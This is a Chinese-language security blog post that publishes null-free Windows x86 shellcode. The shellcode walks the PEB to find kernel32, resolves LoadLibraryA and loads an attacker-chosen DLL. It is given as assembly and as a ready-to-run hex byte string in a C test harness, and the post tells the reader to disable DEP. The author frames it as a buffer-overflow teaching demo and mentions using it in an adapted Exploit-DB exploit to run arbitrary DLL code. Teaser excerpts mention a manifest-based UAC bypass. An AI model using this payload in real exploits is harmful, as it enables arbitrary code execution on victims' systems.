Windows x86 LoadLibraryA Shellcode(Null-Free)

-

murmur

因為部分課程緣故需要展示 Buffer Overflow 可以幹嘛,但是不想包太長的 Shellcode、單純 Demo 彈小算盤好像又太弱了XD。所以拿網路上別人寫好的 Shellcode 小改了一下,分享出來原始 Assembly Code 方便之後有需要的人可以做修改、開發自己的 Shellcode。

Cheat Engine AutoASM 腳本

// windows x86 LoadLibraryA("xxx.dll")
// author: aaaddress1@chroot.org
alloc(script, 1024)

script:
xor edx,edx
mov dl,30
mov edx,fs:[edx]
mov edx,[edx+0C]
mov edx,[edx+1C]
mov eax,[edx+08]
mov esi,[edx+20]
mov edx,[edx]
cmp byte ptr [esi+0C], 33 /* kernel'3'2.dll -> 0x33 */
db 75 f2 // jne -0x0d

mov    edi,eax //eax = handle of kernel32.dll
add    edi,DWORD PTR [eax+0x3c]
mov    edx,DWORD PTR [edi+0x78]
add    edx,eax
mov    edi,DWORD PTR [edx+0x20]
add    edi,eax
xor    ebp,ebp
mov    esi,DWORD PTR [edi+ebp*4]
add    esi,eax
inc    ebp
//esi = API name
cmp    DWORD PTR [esi],0x64616f4c
db 75 f2
cmp    DWORD PTR [esi+0x8],0x41797261
db 75 e9

mov    edi,DWORD PTR [edx+0x24]
add    edi,eax
mov    bp,WORD PTR [edi+ebp*2] //bp = index

mov    edi,DWORD PTR [edx+0x1c]
add    edi,eax // Export Table: uint32_t Address[]

mov    edi,[edi+ebp*4-04]
add    edi,eax // Address of LoadLibraryA = edi

push 0x7f6c6c64 // dll\x20
push 0x2e787878 // xxx.
xor dword ptr [esp+07],0x7f
push esp
call edi

HEX Shellcode

當然大部分人應該沒那個需求要小改,
純粹 Demo 的話可以參考下面我已經幫你轉好的十六進位 Shellcode 字串直接使用:

// LoadLibraryA Shellcode Null-Free
// Author: aaaddress1@chroot.org
int main(void) {
 
 char shellcode[] =
  "\x31\xD2\xB2\x30\x64\x8B\x12\x8B" \
  "\x52\x0C\x8B\x52\x1C\x8B\x42\x08" \
  "\x8B\x72\x20\x8B\x12\x80\x7E\x0C" \
  "\x33\x75\xF2\x8B\xF8\x03\x78\x3C" \
  "\x8B\x57\x78\x01\xC2\x8B\x7A\x20" \
  "\x01\xC7\x31\xED\x8B\x34\xAF\x01" \
  "\xC6\x45\x81\x3E\x4C\x6F\x61\x64" \
  "\x75\xF2\x81\x7E\x08\x61\x72\x79" \
  "\x41\x75\xE9\x8B\x7A\x24\x01\xC7" \
  "\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01" \
  "\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68" \
  "\x64\x6C\x6C\x7F\x68\x78\x78\x78" \
  "\x2E\x83\x74\x24\x07\x7F\x54\xFF" \
  "\xD7";
  
 printf("length: %i\n", strlen(shellcode));
 ((void(*)())shellcode)();
}
上面的程式碼存成 *.cpp 拿個隨便編譯器跑起來會像下面這樣
(喔對,記得 DEP 要關喔)

效果


底下是我拿 2016 隨便一個 Exploit-DB 上挖來的漏洞小改一下,大概像這樣XD
Shellcode 觸發後會去載入 xxx.dll,就可以在 DLL 內塞髒東西跑起來啦。

留言

張貼留言

這個網誌中的熱門文章

DNS網址被劫持查詢不到正確IP怎辦

-
圖片
 有時候會遇到你家小烏龜或 hinet 域名連不上正確網站,有可能會怪怪的對吧?(看片網站連不上)大家可以這麼做,在 Windows 搜尋控制台,然後一路點選 [網路和網際網路] > [檢視網路狀態及工作] > [變更介面卡設定] 接著,看你電腦是插實體線連網、還是 WiFi介面卡,像我是用 WiFi 那就對 WiFi 介面卡點選右鍵內容。 然後找到網際網路通訊協定第4版 Internet Protocol Version 4 (TCP/IPv4) 按內容,並且設定慣用 DNS 伺服器為 1.1.1.1 跟 8.8.8.8 接著,你就會發現你的網站可以看了唷,不會被奇怪小烏龜DNS路由指到奇怪網頁了。
閱讀完整內容

幫 VMware Client 虛擬機啟用 VBS 防護(Virtualization Based Security)

-
圖片
前言 因為演講需求要展示怎打穿 Virtualization 防護,洞都串好了結果發現 VMware 虛擬機 Windows 11 最新版下的 Defender 防毒惡意探索功能的 Hypervisor Code Integrity (HVCI) 怎樣都不給開。然後花了一段時間爬網路上文都沒人撰文解釋,這邊寫一篇文給有需要的人參考XD 有此需求在虛擬機內啟用 VBS 防護的朋友,應該都有嘗試過至配置中「Virtual Machine Settings → Processors → 勾選 Virtualize Intel VT-x/EPT or AMD-V/RVI」並且就能在「Options → Advanced → 勾選 Enable VBS (Virtualization Based Security) support」後,理論上啟動虛擬機後就能使用虛擬機中的 HVCI 防護... 然後這時候你一把 VMware 虛擬機開機,就會彈出一堆 Hyper-V 或 Virtualization 相關的不支援訊息(上圖)怎樣都不給你開機 Orz 好的那怎解決呢?有三大條件必須在 VMware Host 滿足缺一不可、即可讓 VMware Client 可以啟用 HVCI 囉。 關閉 Windows 原生 Hyper-V 虛擬機功能 首先是 Windows 功能(Windows Feature)相關 Hyper-V 與 Hypervisor 平台系列相關功能用於支援 Windows 原生虛擬機功能若啟用狀態下,都會導致 VMware Host 搶占走 Intel EPT 使用權限所致 Client 無法取用 Hypervisor 相關功能,囧。如上圖所示,將上述所有黃框處勾選起來。 系統配置中 Hyper-V / Hypervisor 功能 Intel CPU 所提供的 Hypervisor 系列指令集 HyperCall 被 Windows 重新封裝並以系統角色封裝成 Hyper-V 平台導出之系列 API,因此前面關掉 Windows 功能不代表系統自身的 Hyper-V 平台已經被註記為不得占用 Hypervisor 的狀態;所以需要按上圖所示,以系統管理員身分開啟 PowerShell 並輸入上述兩條指令用以關閉系統原生的 Hyper-V 平台。 Host ...
閱讀完整內容

[Windows] 惡意利用配置錯誤資訊清單(manifest)達成劫持與特權提升

-
圖片
 前言 這篇技巧是我在校稿最近剛出版的書 《Windows APT Warfare:惡意程式前線戰術指南》 正好看到  github.com/L3cr0f/DccwBypassUAC  這份 PoC 提及的 WinSxS 配置錯誤允許駭客劫持達成 UAC 特權提升看到比較有意思的事情所以寫一篇作為筆記。 不過這篇技巧目前在 Windows 10 上除非出現了配置錯誤的 DACL 可被寫入、否則新型的作業系統利用的可能性比較小XD 如果對 UAC 特權提升有興趣的讀者可以參考對岸這篇 BypassUAC原理及方法汇总  我覺得寫得還不錯、或者是看看我的書(?)  WinSxS  Windows 為了原生支援 WinSxS 多重系統模組功能——即同一個系統中可能會有 新舊程式使用到同個系統模組但不同版本號 的狀況。因此可以見到 C:\Windows\WinSxS\ 下有很多不同版本的資源包: 開發者能在編譯時期在純文字的資訊清單 *.manifest 記錄特定系統模組要從特定系統路徑、版本來裝載使用。而這邊引自上述對岸文章一段描述,其中提及了在資訊清單中還有一個特性可以使用: 在Windows中有些可执行程序没有内置的manifest,假设这个程序叫test.exe,如果攻击者在该可执行程序目录下新建一个test.exe.manifest并在manifest文件中指定file元素,则test.exe执行时会加载file元素中loadFrom属性指定的DLL(loadFrom的dll不能在KnownDlls中) 這是一個我覺得蠻有趣的特性,可以解釋為什麼系統槽下會有那麼多純文字保存的資訊清單 *.manifest 文件(我以前一直誤以為是開發者編譯完忘記刪掉XD)這描述說明了兩點: 除了開發者相當熟悉的嵌入式資訊清單,還有導出式資訊清單——在 同層資料夾中保存與程式名同名的 *.manifest 文件 即可被程式裝載器正確識別 無論嵌入或導出式資訊清單:使用 loadFrom  標籤可以指示程式裝載器在「裝載特定 DLL 模組」時便會被 redirect 去裝載另一個特定的 DLL 模組 總而言之當程式裝載器正在初始化一支靜態程式文件、發現其不具嵌入式資訊清單時,那麼就會同層目錄確認是否有同名的 *.ma...
閱讀完整內容